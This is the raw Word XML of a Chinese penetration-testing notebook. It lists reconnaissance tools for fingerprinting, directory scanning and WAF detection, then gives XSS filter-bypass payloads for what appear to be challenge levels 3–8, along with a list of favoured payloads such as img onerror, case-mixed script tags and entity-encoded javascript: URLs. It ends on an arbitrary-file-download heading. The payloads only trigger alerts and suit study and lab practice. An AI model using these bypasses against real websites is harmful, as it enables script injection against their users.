        <w:instrText xml:space="preserve"> HYPERLINK "https://www.exploit-db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7" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//www.exploit-db.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="693058A1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Vulners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vulners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vulners.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC4F4A6" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936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信息深度搜集：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EA6E2D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指纹识别</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1091A784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插件：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>Wappalyzer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3ED42D66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云悉：</w:t>
      </w:r>
      <w:r w:rsidR="00BF52E4">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00BF52E4">
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.yunsee.cn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yunsee.cn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDE6F9A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eb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www.whatweb.net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whatweb.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6C6713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r w:rsidR="00BF52E4">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00BF52E4">
        <w:instrText xml:space="preserve"> HYPERLINK "http://whatweb.bugscaner.com/look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8" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//whatweb.bugscaner.com/look</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="55BB0EC1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目录扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0431ED90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御剑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>1.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7372ED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7kbscan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7kbstorm/7kbscan-WebPathBrute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9" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//github.com/7kbstorm/7kbscan-WebPathBrute</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0A0C97C3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irsearch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maurosoria/dirsearch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0" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//github.com/maurosoria/dirsearch</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2026C705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接口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AADC09E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Finder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Threezh1/JSFinder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1" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//github.com/Threezh1/JSFinder</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="46C330E9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链接查找器：</w:t>
      </w:r>
      <w:r w:rsidR="00BF52E4">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00BF52E4">
        <w:instrText xml:space="preserve"> HYPERLINK "https://github.com/GerbenJavado/LinkFinder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2" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//github.com/GerbenJavado/LinkFinder</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4938275F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搜索关键接口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4B415B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 API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0416EB5F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>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E504E89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ge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14:paraId="69E1D25B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发布</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174FDF2D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pos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14:paraId="6E318D53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$ .ajax</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7E078A08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post</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="02474FDE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get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="04CFADFA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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>识别</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E51F763" w14:textId="77777777"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w00f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EnableSecurity/wafw00f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3" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//github.com/EnableSecurity/wafw00f</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="198C57D7" w14:textId="77777777"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af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Ekultek/WhatWaf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4" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//github.com/Ekultek/WhatWaf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="38129741" w14:textId="77777777" w:rsidR="00F76936" w:rsidRPr="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936"/>
    <w:p w14:paraId="3C416707" w14:textId="77777777" w:rsidR="00CB3A3A" w:rsidRPr="000D5101" w:rsidRDefault="000D5101" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="000D5101">
        <w:t>XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341A4193" w14:textId="77777777" w:rsidR="00CB3A3A" w:rsidRPr="00CB3A3A" w:rsidRDefault="00CB3A3A" w:rsidP="00CB3A3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"&gt;&lt;script&gt;alert('hack</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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')&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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/script&gt;&lt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E52698F" w14:textId="77777777" w:rsidR="00CB3A3A" w:rsidRDefault="00456CC1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3：</w:t>
      </w:r>
      <w:r w:rsidR="00CB3A3A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5CD82CE0" wp14:editId="6C3E759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8227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A4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绕过&lt;</w:t>
      </w:r>
      <w:r w:rsidR="00A448A4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A448A4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA885E3" w14:textId="77777777" w:rsidR="00CB3A3A" w:rsidRDefault="00CB3A3A"/>
    <w:p w14:paraId="5E2547E1" w14:textId="77777777" w:rsidR="00CB3A3A" w:rsidRDefault="00C804F3">
      <w:r>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00CB3A3A" w:rsidRPr="00CB3A3A">
        <w:t>onclick=</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00CB3A3A" w:rsidRPr="00CB3A3A">
        <w:t>alert(/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CB3A3A" w:rsidRPr="00CB3A3A">
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CB3A3A" w:rsidRPr="00CB3A3A">
        <w:t>/)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57436A96" w14:textId="77777777" w:rsidR="00CB3A3A" w:rsidRDefault="00CB3A3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3261D3" wp14:editId="2EDF9D37">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>309089</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4105275" cy="4953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F3">
        <w:t>‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB3A3A">
        <w:t>onmouseover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB3A3A">
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="00C804F3">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB3A3A">
        <w:t>alert(/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB3A3A">
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB3A3A">
        <w:t>/)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>鼠标</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要碰才会</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>触发</w:t>
      </w:r>
      <w:r w:rsidR="00456CC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（这种绕过主要是加多一个引号和绕过&lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505CF341" w14:textId="77777777" w:rsidR="00456CC1" w:rsidRDefault="00456CC1"/>
    <w:p w14:paraId="18ECDAA2" w14:textId="77777777" w:rsidR="00456CC1" w:rsidRDefault="00456CC1"/>
    <w:p w14:paraId="518C4068" w14:textId="77777777" w:rsidR="00456CC1" w:rsidRDefault="00456CC1"/>
    <w:p w14:paraId="0C8FC188" w14:textId="77777777" w:rsidR="00456CC1" w:rsidRDefault="00456CC1"/>
    <w:p w14:paraId="02003987" w14:textId="77777777" w:rsidR="00456CC1" w:rsidRDefault="00456CC1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DABAF95" w14:textId="77777777" w:rsidR="00456CC1" w:rsidRDefault="00456CC1"/>
    <w:p w14:paraId="1E7BC22C" w14:textId="77777777" w:rsidR="00456CC1" w:rsidRDefault="00456CC1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="539F1E59" wp14:editId="1A5C0E3B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>25532</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4391025" cy="3905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D0B4" w14:textId="77777777" w:rsidR="00456CC1" w:rsidRDefault="00456CC1"/>
    <w:p w14:paraId="5B573E24" w14:textId="77777777" w:rsidR="00456CC1" w:rsidRDefault="00456CC1"/>
    <w:p w14:paraId="3CF7C01F" w14:textId="77777777" w:rsidR="00456CC1" w:rsidRDefault="00456CC1"/>
    <w:p w14:paraId="07924553" w14:textId="77777777" w:rsidR="00456CC1" w:rsidRDefault="00C804F3">
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB3A3A">
        <w:t>onclick</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB3A3A">
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB3A3A">
        <w:t>alert</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB3A3A">
        <w:t>(/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB3A3A">
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB3A3A">
        <w:t>/)</w:t>
      </w:r>
      <w:r w:rsidR="00456CC1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="589AB55D" wp14:editId="422C990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514850" cy="609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2F63" w14:textId="77777777" w:rsidR="00456CC1" w:rsidRDefault="00456CC1"/>
    <w:p w14:paraId="17789F37" w14:textId="77777777" w:rsidR="00456CC1" w:rsidRDefault="00456CC1"/>
    <w:p w14:paraId="0980C7F1" w14:textId="77777777" w:rsidR="00C804F3" w:rsidRDefault="00C804F3"/>
    <w:p w14:paraId="2C831C8D" w14:textId="77777777" w:rsidR="00C804F3" w:rsidRDefault="00C804F3"/>
    <w:p w14:paraId="3CEB294F" w14:textId="77777777" w:rsidR="00C804F3" w:rsidRDefault="00C804F3"/>
    <w:p w14:paraId="249C9E9B" w14:textId="77777777" w:rsidR="00C804F3" w:rsidRDefault="00C804F3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绕过了on和script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277D7128" w14:textId="77777777" w:rsidR="00C804F3" w:rsidRPr="00C804F3" w:rsidRDefault="00C804F3" w:rsidP="00C80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C804F3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; &lt;a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C804F3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C804F3"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spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C804F3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>javascript:alert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C804F3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(1)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 w:rsidRPr="00C804F3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126AE500" w14:textId="77777777" w:rsidR="00C804F3" w:rsidRDefault="00C804F3"/>
    <w:p w14:paraId="29DFDFD5" w14:textId="77777777" w:rsidR="00C804F3" w:rsidRDefault="00A448A4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="43F6D4F7" wp14:editId="6F54EF81">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>24669</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4695825" cy="4857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AB604" w14:textId="77777777" w:rsidR="00C804F3" w:rsidRDefault="00C804F3"/>
    <w:p w14:paraId="26455D72" w14:textId="77777777" w:rsidR="00A448A4" w:rsidRDefault="00A448A4"/>
    <w:p w14:paraId="4E1E9569" w14:textId="77777777" w:rsidR="00A448A4" w:rsidRDefault="00A448A4"/>
    <w:p w14:paraId="0656C36D" w14:textId="77777777" w:rsidR="00A448A4" w:rsidRDefault="00A448A4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6：</w:t>
      </w:r>
      <w:r>
        <w:t>过滤了&lt;script、on、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>、data、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>标签</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4993DDC0" w14:textId="77777777" w:rsidR="00A448A4" w:rsidRDefault="00A448A4">
      <w:r>
        <w:t>但是替换之前没有转化为小写字母，所以可以用大小写绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AEEE95" w14:textId="77777777" w:rsidR="00A448A4" w:rsidRPr="00CB3A3A" w:rsidRDefault="00A448A4" w:rsidP="00A448A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kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB3A3A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>"&gt;&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SC</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB3A3A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>r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alert('hack</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB3A3A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>')&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB3A3A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB3A3A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CR</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB3A3A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>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&lt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A03B02E" w14:textId="77777777" w:rsidR="00A448A4" w:rsidRDefault="00A448A4"/>
    <w:p w14:paraId="7A8ABDAF" w14:textId="77777777" w:rsidR="00A448A4" w:rsidRDefault="00A448A4" w:rsidP="00A448A4">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>"&gt;&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>img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 xml:space="preserve">="1.jpg" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>Onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>1)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379BCED9" w14:textId="77777777" w:rsidR="00A448A4" w:rsidRDefault="00A448A4"/>
    <w:p w14:paraId="6F5B2070" w14:textId="77777777" w:rsidR="000D5101" w:rsidRDefault="000D5101"/>
    <w:p w14:paraId="15F85F14" w14:textId="77777777"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7：</w:t>
      </w:r>
      <w:r w:rsidRPr="000D5101">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>过滤了script、on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、data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，并且在过滤前将keyword转换为了小写</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74643570" w14:textId="77777777"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5101">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>第二处引用keyword没有编码，可以闭合input标签后，重写关键字绕过过滤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43630C36" w14:textId="77777777" w:rsidR="000D5101" w:rsidRDefault="000D5101" w:rsidP="000D5101">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>"&gt;&lt;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alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>1)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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D85DA4" w14:textId="77777777" w:rsidR="000D5101" w:rsidRDefault="000D5101"/>
    <w:p w14:paraId="0C8D373F" w14:textId="77777777" w:rsidR="000D5101" w:rsidRDefault="000D5101"/>
    <w:p w14:paraId="208D171F" w14:textId="77777777" w:rsidR="000D5101" w:rsidRDefault="000D5101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8：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBCD2AE" w14:textId="77777777" w:rsidR="000D5101" w:rsidRDefault="000D5101">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="287517A8" wp14:editId="2F19622C">
            <wp:extent cx="5274310" cy="1677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5EB" w14:textId="77777777" w:rsidR="000D5101" w:rsidRDefault="000D5101" w:rsidP="000D5101">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>javascrip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>&amp;#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>116;:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>alert(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044C0A1E" w14:textId="77777777" w:rsidR="000D5101" w:rsidRDefault="000D5101"/>
    <w:p w14:paraId="742CCA08" w14:textId="77777777" w:rsidR="00D7298B" w:rsidRDefault="00D7298B"/>
    <w:p w14:paraId="754F8A64" w14:textId="77777777" w:rsidR="0038154F" w:rsidRDefault="0038154F"/>
    <w:p w14:paraId="077D1757" w14:textId="77777777" w:rsidR="0038154F" w:rsidRDefault="0038154F"/>
    <w:p w14:paraId="64F52591" w14:textId="77777777" w:rsidR="0038154F" w:rsidRDefault="0038154F"/>
    <w:p w14:paraId="2BAF1806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拿出较为好用的payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77396AAE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details/open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toggle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70BE8081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v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onload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5754D943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im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6D1FB7AE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74D66DF7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script&gt;(alert)(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1)&lt;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/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6145A253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&gt;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ourceonerror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:alert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14:paraId="47714542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loadstart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aler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14:paraId="5F7ADF86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ahref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spellStart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:alert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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&gt;222&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DDFCC3" w14:textId="77777777" w:rsidR="0038154F" w:rsidRDefault="0038154F"/>
    <w:p w14:paraId="6A367996" w14:textId="77777777" w:rsidR="00D7298B" w:rsidRDefault="00D7298B"/>
    <w:p w14:paraId="46E36AE6" w14:textId="77777777" w:rsidR="00D7298B" w:rsidRDefault="00D7298B"/>
    <w:p w14:paraId="1D88D99D" w14:textId="77777777" w:rsidR="00D7298B" w:rsidRDefault="00D7298B" w:rsidP="00D7298B">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>任意文件下载</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261130A2" w14:textId="77777777" w:rsidR="00D75791" w:rsidRDefault="00C51675" w:rsidP="00D75791">
      <w:hyperlink r:id="rId51" w:history="1">
        <w:r w:rsidR="00D75791">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://www.cnblogs.com/zhaijiahui/p/8459661.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7C836D19" w14:textId="77777777" w:rsidR="002D6C60" w:rsidRDefault="00C51675" w:rsidP="00D75791">
      <w:hyperlink r:id="rId52" w:history="1">
        <w:r w:rsidR="002D6C60">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
